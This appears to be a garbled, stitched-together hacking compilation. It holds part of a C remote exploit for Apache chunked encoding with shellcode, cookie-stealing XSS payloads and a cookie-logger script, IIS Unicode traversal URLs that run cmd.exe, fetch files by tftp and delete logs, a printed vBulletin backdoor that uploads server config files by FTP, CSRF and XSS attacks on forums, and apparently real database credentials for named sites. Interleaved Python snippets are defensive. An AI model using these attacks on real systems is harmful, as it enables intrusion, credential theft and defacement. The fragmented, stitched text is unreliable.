                victim.repzero = atoi(optarg);
                printf("Number of zeroes will be %d\n", victim.repzero);
                break;
            case 'o':
                bruteforce++;
                switch(*optarg) {
                    case 'f':
                        victim.type = "FreeBSD";
                        victim.retaddr = 0x80a0000;
                        victim.delta = -150;
                        victim.repretaddr = 6;
                        victim.repzero = 36;
                        break;
                    case 'o':
                        victim.type = "OpenBSD";
                        victim.retaddr = 0x80000;
                        victim.delta = -146;
                        victim.repretaddr = 6;
                        victim.repzero = 36;
                        break;
                    case 'n':
                        victim.type = "NetBSD";
                        victim.retaddr = 0x080e0000;
                        victim.delta = -90;
                        victim.repretaddr = 5;
                        victim.repzero = 42;
                        break;
                    default:
                        printf("[-] Better luck next time!\n");
                        break;
                }
                break;
            /* optional stuff */
            case 'w':
                sc_timeout = atoi(optarg);
                printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
                break;
            case 'c':
                cmdz = optarg;
                break;
            default:
                usage();
                break;
        }
    }
    if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
        printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
        return -1;
    }
    printf("[*] Resolving target host.. ");
    fflush(stdout);
    he = gethostbyname(hostp);
    if(he)
        memcpy(&ia.s_addr, he->h_addr, 4);
    else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
        printf("There'z no %s on this side of the Net!\n", hostp);
        return -1;
    }
    printf("%s\n", inet_ntoa(ia));

    srand(getpid());
    signal(SIGPIPE, SIG_IGN);
    for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
        /* skip invalid return addresses */
        if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
            continue;

        sock = socket(PF_INET, SOCK_STREAM, 0);
        sin.sin_family = PF_INET;
        sin.sin_addr.s_addr = ia.s_addr;
        sin.sin_port = htons(atoi(portp));
        if(!progress)
            printf("[*] Connecting.. ");
        fflush(stdout);
        if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
            perror("connect()");
            exit(1);
        }
        if(!progress)
            printf("connected!\n");

        p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
                            + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
        PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
        for (i = 0; i < REP_SHELLCODE; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_3, PADDING_3);
            PUT_STRING(": ");
            PUT_BYTES(NOPCOUNT, NOP);
            memcpy(p, shellcode, sizeof(shellcode) - 1);
            p += sizeof(shellcode) - 1;
            PUT_STRING("\r\n");
        }
        for (i = 0; i < REP_POPULATOR; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_1, PADDING_1);
            PUT_STRING(": ");
            for (j = 0; j < victim.repretaddr; j++) {
                *p++ = victim.retaddr & 0xff;
                *p++ = (victim.retaddr >> 8) & 0xff;
                *p++ = (victim.retaddr >> 16) & 0xff;
                *p++ = (victim.retaddr >> 24) & 0xff;
            }
            PUT_BYTES(victim.repzero, 0);
            PUT_STRING("\r\n");
        }
        PUT_STRING("Transfer-Encoding: chunked\r\n");
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
        PUT_STRING(buf);
        PUT_BYTES(PADSIZE_2, PADDING_2);
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
        PUT_STRING(buf);
        if(!shown_length) {
            printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
            shown_length = 1;
        }
        write(sock, expbuf, p - expbuf);
        progress++;
        if((progress%70) == 0)
            progress = 1;
        if(progress == 1) {
            printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
            for(i = 0; i < 40; i++)
                printf(" ");
            printf("\n");
            if(bruteforce)
                putchar(';');
        }
        else
            putchar(((rand()>>8)%2)? 'P': 'p');

        fflush(stdout);
        responses = 0;
        while (1) {
            fd_set fds;
            int n;
            struct timeval tv;
            tv.tv_sec = sc_timeout;
            tv.tv_usec = 0;
            FD_ZERO(&fds);
            FD_SET(0, &fds);
            FD_SET(sock, &fds);
            memset(buf, 0, sizeof(buf));
            if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
                if(FD_ISSET(sock, &fds)) {
                    if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
                        break;
                    if(n >= 1) {
                        if(!owned) {
                            for(i = 0; i < n; i++)
                                if(buf[i] == 'G')
                                    responses++;
                                else
                                    responses = 0;
                            if(responses >= 2) {
                                owned = 1;
                                write(sock, "O", 1);
                                write(sock, cmdz, strlen(cmdz));
                                printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n",
                                       victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
                                printf("Experts say this isn't exploitable, so nothing will happen now: ");
                                fflush(stdout);
                            }
                        } else {
                            write(1, buf, n);
                        }
                    }
                }
                if(FD_ISSET(0, &fds)) {
                    if((n = read(0, buf, sizeof(buf) - 1)) < 0)
                        exit(1);
                    write(sock, buf, n);
                }
            }
            if(!owned)
                break;
        }
        free(expbuf);
        close(sock);
        if(owned)
            return 0;
        if(!bruteforce) {
            fprintf(stderr, "Ooops.. hehehe!\n");
            return -1;
        }
    }
    return 0;
}
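Both exploits above end their request with a chunk-size line built by snprintf("\r\n%x\r\n", delta): printed with %x, the negative per-target delta becomes eight hex digits that a parser storing the value in a signed 32-bit int reads back as a small negative length. The following Python is an added example (not part of the original listing or of GOBBLES' code) that models that signed read next to a bounded parser which rejects the same line; PADSIZE_2 and the deltas come from the exploit's defines and targets table, the 1 MiB limit is an assumed policy value.

```python
import struct

# Values taken from the exploit listing above: PADSIZE_2 is the first (benign)
# chunk; the per-target delta is emitted as the second chunk-size line.
PADSIZE_2 = 5
TARGET_DELTAS = {"openbsd": -146, "freebsd": -150, "netbsd": -90}
MAX_CHUNK = 1 << 20  # assumed policy limit for this example (1 MiB)


def chunk_size_line(value: int) -> bytes:
    """Build the chunk-size line the way snprintf("\\r\\n%x\\r\\n", delta) does:
    %x prints a negative int as its 32-bit two's-complement hex digits."""
    return b"\r\n%x\r\n" % (value & 0xFFFFFFFF)


def exploit_style_body(delta: int) -> bytes:
    """Chunked body as the exploit lays it out after the headers: a 5-byte
    chunk of 'B' padding followed by the oversized chunk-size line."""
    return b"%x\r\n" % PADSIZE_2 + b"B" * PADSIZE_2 + chunk_size_line(delta)


def parse_chunk_size_signed32(line: bytes) -> int:
    """Model of the vulnerable pattern: the hex value is stored in a signed
    32-bit int, so 'ffffff6e' comes back as -146 and slips past a check that
    only rejects values larger than the destination buffer."""
    digits = line.strip().split(b";", 1)[0]
    raw = int(digits, 16) & 0xFFFFFFFF
    return struct.unpack("<i", struct.pack("<I", raw))[0]


def parse_chunk_size_safe(line: bytes, limit: int = MAX_CHUNK) -> int:
    """Bounded parser: hex digits only, at most eight of them, and the
    unsigned result must stay under an explicit limit."""
    digits = line.strip().split(b";", 1)[0]  # drop any chunk extension
    if not digits or any(c not in b"0123456789abcdefABCDEF" for c in digits):
        raise ValueError("malformed chunk-size line %r" % line)
    if len(digits) > 8:
        raise ValueError("chunk-size does not fit in 32 bits: %r" % digits)
    size = int(digits, 16)
    if size > limit:
        raise ValueError("chunk-size %d exceeds limit %d" % (size, limit))
    return size


def walk_chunks(body: bytes, limit: int = MAX_CHUNK):
    """Walk a chunked body with the bounded parser.
    Returns (sizes_accepted, error_message_or_None)."""
    sizes, pos = [], 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return sizes, "truncated chunk-size line"
        try:
            size = parse_chunk_size_safe(body[pos:end], limit)
        except ValueError as exc:
            return sizes, str(exc)
        sizes.append(size)
        if size == 0:
            return sizes, None  # last-chunk marker reached
        pos = end + 2 + size
        if body[pos:pos + 2] != b"\r\n":
            return sizes, "chunk data not CRLF-terminated"
        pos += 2


if __name__ == "__main__":
    for os_name, delta in TARGET_DELTAS.items():
        line = chunk_size_line(delta)
        print(os_name, line, "signed32 ->", parse_chunk_size_signed32(line),
              "| bounded parser ->", walk_chunks(exploit_style_body(delta))[1])
```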
(angels-bytes.com)
http://www.angels-bytes.com/?show=tools&action=info&id=19

php (vb)

index.php (admin):

<?php
$LOGIN = "User";
$PASSWORD = "Password";

function error ($error_message) {
    echo $error_message . "";
    exit;
}

if ( (!isset($PHP_AUTH_USER)) || !(($PHP_AUTH_USER == $LOGIN) && ($PHP_AUTH_PW == "$PASSWORD")) ) {
    header("WWW-Authenticate: Basic entrer=\"Form2txt admin\"");
    header("HTTP/1.0 401 Unauthorized");
    error("<p align=right><font face=Tahoma size=2 color=Red></font></p>");
}
?>

User
Password

HTML

"vBulletin 2.2.0"

-------- : vBulletin
-------- : WebServer
: vBulletin !!

HTML :

<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>

IP Address

(IIS / Apache) Log :
Apache logs . Access Log :

GET /bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161

http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]

.. Forgot Password ..

HTML (IMG) : <script>, <img>
Demon
Be Secret .. Don't be Lamer
2002 - 1 - 31
2.2.0

Powered by: vBulletin

1. http://www.vbulletin.org/index.php?topic=<script>alert(document.cookie)</script>
2. http://www.vbulletin.org/index.php?=forum/view.php&topic=../../../../../../../etc/passwd

********************


(Jouko Pynnonen)

vBulletin (http://www.vbulletin.com/) is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board.

vBulletin templates are parsed with the eval() function. This could be somewhat safe as long as the parameters to eval() are under strict control. Unfortunately this is where vBulletin fails. With an URL crafted in a certain way, a remote user may control the eval() parameters and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web server user, typically "nobody", start an interactive shell and try to elevate their privilege. The configuration files are accessible for the web server so the user can in any case access the MySQL database containing the forums and user information.

According to the authors the vulnerability exists in all versions of vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer overrun or other platform-dependent issues, so it's presumably exploitable under any OS or platform.

DETAILS
=======
vBulletin templates are implemented in the following way: the gettemplate() function in global.php is used to fetch a template from database. The code is then passed to eval(). If we take index.php for an example, there's this code:

if ($action=="faq") {
    eval("echo dovars(\"".gettemplate("faq")."\");");
}

The dovars() function does some variable replacing, such as replace <largefont> with <font size="10">. The gettemplate() function is defined in global.php:

function gettemplate($templatename,$escape=1) {
    // gets a template from the db or from the local cache
    global $templatecache,$DB_site;
    if ($templatecache[$templatename]!="") {
        $template=$templatecache[$templatename];
    } else {
        $gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='".addslashes($templatename)."'");
        $template=$gettemp[template];
        $templatecache[$templatename]=$template;
    }
    if ($escape==1) {
        $template=str_replace("\"","\\\"",$template);
    }
    return $template;
}

For effectiveness the function implements a simple cache for template strings. After fetching them from the database they're stored in the templatecache[] array. This array is checked for the template before doing the SQL query. Unfortunately the array is never initialized, so a user can pass array contents in the URL, e.g. (for simplicity not %-escaped)

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page with the words "hello world". The eval() call above will execute

echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a value containing quotation marks and other symbols. Quotation marks aren't always escaped as seen in the code above, in which case index.php could end up executing code like

echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It doesn't take a rocket scientist to figure out how a remote user could execute arbitrary code from here, so further details about exploitation aren't necessary. If your vBulletin board produces an error message with an URL like the one above prefixed with a single quotation mark, it's definitely vulnerable.

The above example works with the "Lite" version. The commercial versions are vulnerable too, but details may differ. After a little experimenting on the Jelsoft's test site I found some of the commercial versions also have an eval() problem with URL redirecting, e.g.

http://www.site.url/member.php?acti...ypass&url=hello"world

and a similar one in the Lite version:

http://www.site.url/search.php?acti...s&templatecache[standardredirect]=hello"world

*******************
3 SQL

SQL Server (port 1433) / ASP / PHP

_LinuxRay

Administrator

User Name / Passwd (ASP)

*.asp + .htr :

http://target/page.asp+.htr

target : ...
page.asp : ...
+.htr : ...

View Source (ASP) :

<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>

----------------------------------------------------------------
_LinuxRay
6666666
-----------------------------------------------------------------

ASP :

Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5

*.inc

<!--#include file = "database.inc"-->

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa

global.asa+.htr (IIS 3)
file.asp::$DATA (IIS 3)

SQL !!

Visual InterDev 6.0 / ACCESS 2000 :

File -> New -> Existing Data Project -> Create -> Data Link Properties
1 - Select or enter server name
2 - User Name
3 - Password (Blank Password)
Test Connection -> "Test Connection Succeeded"
Select the database on the server -> OK

http://www.moe.gov.sa/
1 - http://www.moe.gov.sa/news_admin.asp

Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/news_admin.asp, line 7

htr : http://www.moe.gov.sa/news_admin.asp+.htr

<!--#include file = "database.inc"-->

database.inc : http://www.moe.gov.sa/database.inc

<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"
%>

http://www.itsalat.com/
1 - User name : sa Passwd : sp2000

*****************

IIS (4, 5) - IIS 5.0 :

http://www.xxxxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

c: (dir)

scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\

http://www.xxxxx.com//////+\/....2/cmd.exe/?/c

Dir (System32) :

http://www.xxxxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

http://www.xxxxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\Winnt\System32

\Winnt\System32

http://www.xxxxx.com/scripts/.....exe?/c+dir+c:\

/c+dir+c:\
http://www.xxxxx.com/scripts/.../Winnt/System32

tftp.exe

www.geocities.com/anorR1234/tftpd32.zip -> C:\ (tftp32.exe)

http://www.xxxxx.com/scripts/.....exe?/c+dir+c:\

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

tftp.exe
"-i"
1.1.1.1
GET
index.htm
C:\inetpub\wwwroot\index.htm
C:\
index.htm

http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm

http://server/msadc/..../..../c+del+c:/*.log
--------------------------------------
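As an added defender-side example (not from the original document), the following Python runs over constructed Apache access-log lines and flags the three request patterns this page describes: the overlong-UTF-8 traversal to cmd.exe from the IIS section above, vBulletin cookie values (bbpassword=, sessionhash=) arriving in a request URL the way the earlier <img src=...> cookie-theft script delivers them to a foreign server, and the templatecache[] parameter from the Pynnonen advisory. Log lines, addresses, hashes and tag names are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache combined-format lines; addresses, timestamps and hashes
# are made up. Line 2 is the IIS overlong-UTF-8 traversal, line 3 a stolen
# vBulletin cookie string landing in our log, line 4 the eval() injection.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2002:10:00:01 +0300] "GET /index.php?action=faq HTTP/1.0" 200 5120
10.0.0.7 - - [31/Jan/2002:10:00:02 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 1320
10.0.0.9 - - [31/Jan/2002:10:00:03 +0300] "GET /bbuserid=86;%20bbpassword=0123456789abcdef0123456789abcdef;%20sessionhash=fedcba98 HTTP/1.0" 404 210
10.0.0.11 - - [31/Jan/2002:10:00:04 +0300] "GET /index.php?action=faq&templatecache[faq]=hello%22world HTTP/1.0" 200 40
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
VB_COOKIE_RE = re.compile(r"(?i)(?:^|[?&;/ ])(?:bbpassword|sessionhash)=")


def decode_request_target(target: str):
    """Percent-decode, then decode UTF-8 by hand the permissive way the
    vulnerable IIS decoder did: overlong forms such as C0 AF, E0 80 AF or
    FC 80 80 80 80 AF all collapse to '/'. Returns (text, overlong_count)."""
    raw = unquote_to_bytes(target)
    out, overlong, i = [], 0, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        # lead byte pattern -> number of continuation bytes
        for lead_mask, lead_val, n in ((0xE0, 0xC0, 1), (0xF0, 0xE0, 2), (0xF8, 0xF0, 3),
                                       (0xFC, 0xF8, 4), (0xFE, 0xFC, 5)):
            if b & lead_mask == lead_val:
                break
        else:
            out.append("\ufffd")  # stray continuation byte
            i += 1
            continue
        cont = raw[i + 1:i + 1 + n]
        if len(cont) < n or any(c & 0xC0 != 0x80 for c in cont):
            out.append("\ufffd")
            i += 1
            continue
        cp = b & (0xFF >> (n + 2))  # payload bits of the lead byte
        for c in cont:
            cp = (cp << 6) | (c & 0x3F)
        if cp < 0x80:
            overlong += 1  # an ASCII byte smuggled through a multi-byte form
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + n
    return "".join(out), overlong


def classify(target: str):
    """Return the detection tags for one request target (empty if benign)."""
    decoded, overlong = decode_request_target(target)
    tags = []
    if overlong:
        tags.append("overlong-utf8")
    if TRAVERSAL_RE.search(decoded):
        tags.append("traversal")
    if "cmd.exe" in decoded.lower():
        tags.append("cmd.exe")
    if VB_COOKIE_RE.search(decoded):
        tags.append("vb-cookie-in-url")  # cookies belong in the Cookie header
    if "templatecache[" in decoded:
        tags.append("templatecache-injection")
    return tags


def analyze(log_text: str):
    """Run classify() over every request line; return only the flagged ones."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQ_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if tags:
            hits.append({"line": lineno, "ip": m.group("ip"),
                         "target": m.group("target"), "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(hit["line"], hit["ip"], ",".join(hit["tags"]), hit["target"])
```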

*******************

vBulletin 2.2.5 (forum) :

PHP:
------------------------------------------------------------------------------
if ($action=="modify") {
    // single letters assembled below into the call-home URL
    $vbxh = h;
    $vbxt = t;
    $vbxp = p;
    $vbxw = w;
    $vbxa = a;
    $vbx1 = 1;
    $vbxr = r;
    $vbxb = b;
    $vbxn = n;
    $vbxe = e;
    $vbxo = o;
    $vbxy = y;
    $vbxl = l;
    echo "<!-- ";
    // reports the host and script path of every board running this copy
    $file = fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME", "r");
    $rf = fread($file, 1000);
    fclose($file);
    echo " -->";
}
------------------------------------------------------------------------------

http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME

vBulletin 2.2.6 (option) :

PHP:
------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
echo " -->";
------------------------------------------------------------------------------

functions :

PHP:
------------------------------------------------------------------------------
// decodes to http://saudi.no-ip.com/~royal/.x2.inc (the URL listed below)
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
------------------------------------------------------------------------------

http://saudi.no-ip.com/ (WELCOME TO arab1.net)
http://saudi.no-ip.com/~royal/.x2.inc .......

PHP:
------------------------------------------------------------------------------
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com
<?php
// collects the Apache and vBulletin config files (database credentials) ...
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');   // FTP password, base64-obscured
// ... uploads the archive by FTP and removes the traces
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
-->
</div>
------------------------------------------------------------------------------

"vBulletin 2.2.9"

....vBulletin 2.2.9 :

1 - php :

<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a log file.

// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] == "Log") {
    $Header = "<!--";
    $Footer = "-->";
}
Else {
    $Header = "";
    $Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
    Case "Log":
        $Data = $HTTP_GET_VARS['Cookie'];
        $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
        $Log = FOpen ($LogFile, "a+");
        FWrite ($Log, Trim ($Data) . "\n");
        FClose ($Log);
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
    Case "List":
        // note: In_Array() is called with one argument and $Records is still unset here, as in the original
        If (!File_Exists ($LogFile) || !In_Array ($Records)) {
            Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
            Exit ();
        }
        Else {
            Print ("</Center></Pre>");
            $Records = Array_UniQue (File ($LogFile));
            Print ("<Pre>");
            Print ("<B>.:: Statics</B>\n");
            Print ("\n");
            Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
            Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
            Print ("\n");
            Print ("<B>.:: Options</B>\n");
            Print ("\n");
            If (Count (File ($LogFile)) > 0) {
                $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
            }
            Else {
                $Link['Download'] = "[No Records in Log]";
            }
            Print ("o Download Log : " . $Link['Download'] . "\n");
            Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
            Print ("\n");
            Print ("<B>.:: Records</B>\n");
            Print ("\n");
            While (List ($Line[0], $Line[1]) = Each ($Records)) {
                Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
            }
        }
        Print ("</Pre>");
        Break;
    Case "Delete":
        @UnLink ($LogFile);
        Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
}
?>

2 - php

3 - member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

[script code] :

<Script>location='Http://[...]?Action=Log&Cookie='+(document.cookie);</Script>

4 - http://[...]/?Action=List

"phpbb 2.0.0"

phpbb 2.0.0 (vb)

PhpBB2 admin_ug_auth.php :

2.0.0

<html>
<head>
</head>
<body>
<form method="post" action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

http://www.domain_name/board_directory (html)

Administrator -> submit

!!

http://forums.xos.ca/

...

"php nuke"

php nuke

PHP Nuke version 6.0

images/forum/avatars

text !!!!

Your Account -> Your Info -> view source -> uid :

<input type="hidden" name="uid" value="2111">

... 2111

html (http://nukesite/) :

<!-- START CODE -->
<form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form>
<!-- END CODE -->

html ..

">
<b
...

submit -> Your Account .. !!!!

"><h1>TESTING</h1><b
TESTING
!!....

"><b
..
30 (maxlength)
....
xss

=(

Packet Storm Security
--------------------- :
http://packetstorm.securify.com/
'New Files Today'
Ken Williams
(Kroll-O'Gara, http://www.securify.com/)

Security Focus
--------------- :
http://www.securityfocus.com/

BugTraq
------- : (Security Focus, http://www.securityfocus.com/ ; Netspace, http://www.netspace.org/)
BugTraq mailing list : Aleph1 (aleph1@underground.org)
spams

http://www.securityfocus.com/
'search'

Searching
-----------
Sendmail 8.8.3 : 'sendmail 8.8.3'
local DoS sendmail : 'local DoS sendmail'

1. http://rootshell.redi.tk/
2. http://www.ussrback.com
3. http://www.insecure.org/sploits.html
4. http://www.linux.com.cn/hack.co.za

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

1. http://www.haker.com.pl
2. http://www.webattack.com/
3. http://blacksun.box.sk
4. http://www.blackcode.com

http://www.TipsClub.com/